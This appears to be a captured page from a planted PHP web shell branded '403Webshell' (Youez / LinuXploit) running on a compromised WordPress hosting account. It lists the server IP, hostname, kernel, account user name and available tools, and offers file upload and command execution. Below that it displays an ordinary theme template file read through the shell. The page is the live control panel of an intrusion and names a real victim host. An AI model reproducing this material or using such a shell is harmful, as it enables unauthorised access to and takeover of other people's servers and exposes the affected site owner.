403Webshell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.222
Web Server : Apache
System : Linux webm005.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : karinebmkh ( 644538)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/karinebmkh/www2/wp-content/themes/glaza/templates/layouts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/karinebmkh/www2/wp-content/themes/glaza/templates/layouts/fw-classic.php
<?php
/**
 * @param array $settings
 * fw classic
 */
if ( ! function_exists( 'glaza_classic' ) ) :
	function glaza_classic( $settings = array() ) {

		$settings['block_style']   = 'full_width';
		$settings['class_name']    = 'fw-block fw-classic';
		$settings['no_found_rows'] = false;
		$settings['block_name']    = 'classic';

		$query_data = glaza_query_custom( $settings );

		if ( $query_data->have_posts() ) {
			glaza_block_open( $settings, $query_data );
			glaza_block_header( $settings );
			glaza_block_content_open();
			glaza_classic_listing( $settings, $query_data );
			glaza_block_content_close();
			glaza_pagination( $settings, $query_data );
			glaza_block_close();
			wp_reset_postdata();
		}
	}
endif;

/**
 * classic listing
 */
if ( ! function_exists( 'glaza_classic_listing' ) ) :
	function glaza_classic_listing( $settings = array(), $query_data ) {
		if ( method_exists( $query_data, 'have_posts' ) ) :
			while ( $query_data->have_posts() ) :
				$query_data->the_post();
				glaza_post_classic( $settings, $query_data );
			endwhile;
		endif;
	}
endif;

Youez - 2016 - github.com/yon3zu
LinuXploit